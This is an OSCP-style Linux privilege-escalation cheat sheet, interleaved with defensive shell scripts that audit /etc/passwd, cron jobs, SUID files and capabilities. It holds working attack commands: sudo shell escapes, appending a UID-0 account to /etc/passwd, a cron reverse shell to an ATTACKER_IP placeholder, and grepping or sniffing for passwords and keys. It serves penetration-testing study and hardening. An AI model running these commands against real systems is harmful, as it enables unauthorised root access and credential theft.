Linux Privilege Escalation

If you’ve got a foothold on a Linux target during OSCP-style enumeration, here’s a no-nonsense walkthrough of techniques I use to go from low-priv user to root.


Automated Enumeration Tools

# linPEAS (best all-in-one)
./linpeas.sh

# LinEnum (quick recon)
./LinEnum.sh

# Linux Exploit Suggester
./linux-exploit-suggester.sh

Use these when you're stuck or want to double-check your manual recon.

While automated scans are useful, starting with a manual sweep is often quicker and more efficient.

Manual Enumeration

Initial Enumeration

# Identify system, kernel, and architecture
whoami && id
uname -a
cat /etc/os-release
lscpu
hostname
# Users, groups, and history
cat /etc/passwd
cat /etc/group
cat ~/.bash_history
# Network discovery
ip a
ip route
netstat -tunlp
# Check sudo permissions
sudo -l

Sudo Privileges (GTFOBins)

# If any common binaries are listed in sudo -l, check GTFOBins
sudo find . -exec /bin/sh \; -quit
sudo vim -c ':!sh'
sudo awk 'BEGIN {system("/bin/sh")}'
sudo less /etc/passwd  # then use !/bin/sh

SUID Binaries

# Find binaries with SUID bit set
find / -perm -4000 -type f 2>/dev/null

If you find something like bash, find, cp, or python, check GTFOBins for how to abuse them. Example:

./bash -p

Writable /etc/passwd

# If /etc/passwd is writable, generate a root hash
openssl passwd -1 w00t

# Append a new root user
echo "root2:<HASH>:0:0:root:/root:/bin/bash" >> /etc/passwd

# Switch user
su root2
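From the defender's side, the two things the section above relies on are easy to audit: write bits on /etc/passwd and a second UID-0 entry (with or without a hash stored inline instead of in /etc/shadow). The following shell function is an added example, not part of the original notes; it assumes GNU coreutils stat, and the function name audit_passwd and the return-code convention (1 = findings, 0 = clean) are this example's own.

```shell
#!/bin/sh
# Audit a passwd-format file for the conditions the section above depends on:
#  - the file carries a group- or world-write bit
#  - an account other than root has UID 0 (an appended "root2", for instance)
#  - a UID-0 entry keeps its password hash in passwd instead of shadow
# Added example, not from the original page. Assumes GNU coreutils stat.
# Usage: audit_passwd /etc/passwd  -> prints findings; returns 1 if any, 0 if clean

audit_passwd() {
    file="$1"
    n=0

    # Symbolic mode such as -rw-r--r--: position 6 is group write, 9 is other write
    perms=$(stat -L -c '%A' "$file") || return 2
    case "$perms" in
        ?????w*|????????w*)
            echo "WRITABLE: $file is $perms"
            n=$((n + 1)) ;;
    esac

    # Every UID-0 account besides root is a second superuser
    extra=$(awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$file")
    for name in $extra; do
        echo "UID0: account '$name' has UID 0"
        n=$((n + 1))
    done

    # A UID-0 entry whose second field is not x/*/!/empty carries a live hash
    inline=$(awk -F: '$3 == 0 && $2 != "x" && $2 != "*" && $2 != "!" && $2 != "" { print $1 }' "$file")
    for name in $inline; do
        echo "HASH: '$name' stores its password hash directly in $file"
        n=$((n + 1))
    done

    [ "$n" -eq 0 ]
}

# With "live" as the first argument, check the real file on this host
if [ "${1:-}" = "live" ]; then
    audit_passwd /etc/passwd && echo "/etc/passwd looks clean"
fi
```

Run it as `sh audit_passwd.sh live`, or source it and point audit_passwd at a copy of the file pulled from a host under investigation; a non-zero exit makes it usable as a check in a configuration scanner.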

Crontab + Writable Scripts

# List all cron jobs
ls -la /etc/cron*
crontab -l

If a script run by cron is writable:

echo "bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1" >> /path/to/script.sh
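The same cron misconfiguration can be found before anyone abuses it by walking the system crontab and checking every absolute path in each job's command for group/other write bits, on the file itself and on the directory that holds it. The script below is an added example rather than the page's own material; it assumes GNU coreutils stat and the /etc/crontab layout (five schedule fields, then the user, then the command, or an @reboot-style shortcut), and the function names writable_by_others and audit_cron_file are this example's own.

```shell
#!/bin/sh
# Audit a system crontab (min hour dom mon dow user command, or @reboot user command)
# for jobs that run a script non-root users could edit, or that sits in a directory
# they could write to.
# Added example, not from the original page. Assumes GNU coreutils stat.
# Usage: audit_cron_file /etc/crontab  -> prints findings; returns 1 if any, 0 if clean

# True when a symbolic mode string (e.g. -rwxrwxrwx) has a group- or other-write bit
writable_by_others() {
    case "$1" in
        ?????w*|????????w*) return 0 ;;
        *) return 1 ;;
    esac
}

audit_cron_file() {
    cronfile="$1"
    findings=$(
        set -f   # no pathname expansion: cron schedules are full of '*'
        # drop comments, blank lines and VAR=value assignments
        grep -Ev '^[[:space:]]*(#|$)|^[[:space:]]*[A-Za-z_][A-Za-z0-9_]*=' "$cronfile" |
        while IFS= read -r line; do
            set -- $line
            case "$1" in
                @*) [ $# -ge 3 ] || continue; shift 2 ;;   # @reboot user command...
                *)  [ $# -ge 7 ] || continue; shift 6 ;;   # 5 schedule fields + user
            esac
            # every absolute path in the command is a candidate script or binary
            for tok in "$@"; do
                case "$tok" in /*) ;; *) continue ;; esac
                if [ -f "$tok" ]; then
                    mode=$(stat -L -c '%A' "$tok")
                    if writable_by_others "$mode"; then
                        echo "WRITABLE script $tok ($mode) run by: $line"
                    fi
                fi
                dir=$(dirname "$tok")
                if [ -d "$dir" ]; then
                    dmode=$(stat -L -c '%A' "$dir")
                    if writable_by_others "$dmode"; then
                        echo "WRITABLE dir $dir ($dmode) holds $tok run by: $line"
                    fi
                fi
            done
        done
    )
    if [ -n "$findings" ]; then
        printf '%s\n' "$findings"
        return 1
    fi
    return 0
}

# With "live" as the first argument, audit the real cron files on this host
if [ "${1:-}" = "live" ]; then
    for f in /etc/crontab /etc/cron.d/*; do
        [ -f "$f" ] && audit_cron_file "$f"
    done
fi
```

Per-user crontabs (crontab -l) lack the user field, so they would need the shift count changed from 6 to 5; the directory check deliberately flags sticky world-writable directories such as /tmp too, since a job reading a script from there is worth a look regardless.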

Password Hunting

# Hardcoded or leaked passwords
grep -iR "password" / 2>/dev/null
find / -name id_rsa 2>/dev/null
# .bash_history and config files
cat ~/.bash_history
find / -name '*config*' 2>/dev/null

Kernel Exploits

# Kernel info
uname -r
# Use exploit suggester
linux-exploit-suggester.sh
# Compile and run exploit
gcc exploit.c -o exploit
./exploit

Try kernel exploits only if everything else fails.


Environment Variables & User Trails

# Check env vars for secrets
env | grep -i pass

# Also check .bashrc or init scripts
cat ~/.bashrc

Capabilities and setcap

# Find binaries with Linux capabilities
getcap -r / 2>/dev/null

If cap_setuid is set on python, perl, or bash, you can likely escalate via the GTFOBins method for that binary.
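Both the SUID section and the capabilities section above boil down to "is there a privileged binary here that should not be?", which is a baseline question. The added example below (not code from the original notes) answers it from the administrator's side: audit_suid lists SUID files under a root that are missing from an approved baseline built on a known-good host, and flag_dangerous_caps reads getcap -r output and keeps only entries granting capabilities that amount to root (cap_setuid and friends). It assumes GNU find and grep; both function names, the baseline-file format (one absolute path per line) and the return-code convention are this example's own.

```shell
#!/bin/sh
# Baseline-style audits for the SUID and capability findings described above.
# Added example, not from the original page. Assumes GNU find/grep and a baseline
# file with one absolute path per line, generated on a known-good host.

# audit_suid ROOT BASELINE_FILE
# Prints every SUID file under ROOT that is not listed in BASELINE_FILE;
# returns 1 if any were printed, 0 if the host matches the baseline.
audit_suid() {
    root="$1"; baseline="$2"
    [ -r "$baseline" ] || { echo "baseline $baseline is unreadable" >&2; return 2; }
    # -xdev keeps the walk on one filesystem; grep -vxF drops exact baseline matches
    unexpected=$(find "$root" -xdev -perm -4000 -type f 2>/dev/null | sort |
                 grep -vxF -f "$baseline" || true)
    if [ -n "$unexpected" ]; then
        printf '%s\n' "$unexpected"
        return 1
    fi
    return 0
}

# flag_dangerous_caps < getcap-output
# Accepts both getcap output styles ("path = caps+ep" and "path caps=ep") on stdin
# and prints the lines that grant a capability letting a process become root,
# bypass file permissions, or load kernel code. Returns 1 if any line printed.
flag_dangerous_caps() {
    ! grep -E 'cap_(setuid|setgid|dac_override|dac_read_search|sys_admin|sys_ptrace|sys_module|chown)'
}

# With "live" as the first argument, run both audits against this host; with no
# baseline given, every SUID file is listed so the output can become the baseline.
if [ "${1:-}" = "live" ]; then
    audit_suid / "${2:-/dev/null}"
    getcap -r / 2>/dev/null | flag_dangerous_caps
fi
```

Generate the baseline once with `sh audit.sh live > suid-baseline.txt` on a freshly built host, then run `sh audit.sh live suid-baseline.txt` periodically; anything printed is either a new package or the kind of stray bash or find binary the section above describes.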


⚡ Bonus: TCPDump Credentials via Loopback

# If you can run tcpdump with sudo
sudo tcpdump -i lo -A | grep pass

This captures loopback traffic, where local web or database logins sometimes travel in cleartext.


Check These Too

# Directories writable by the current user
find / -writable -type d 2>/dev/null

# Mounted disks
mount
lsblk
cat /etc/fstab

# Loaded kernel modules
lsmod
/sbin/modinfo <module>

Last updated 2 days ago
Check for payloads tied to your allowed binaries: https://gtfobins.github.io/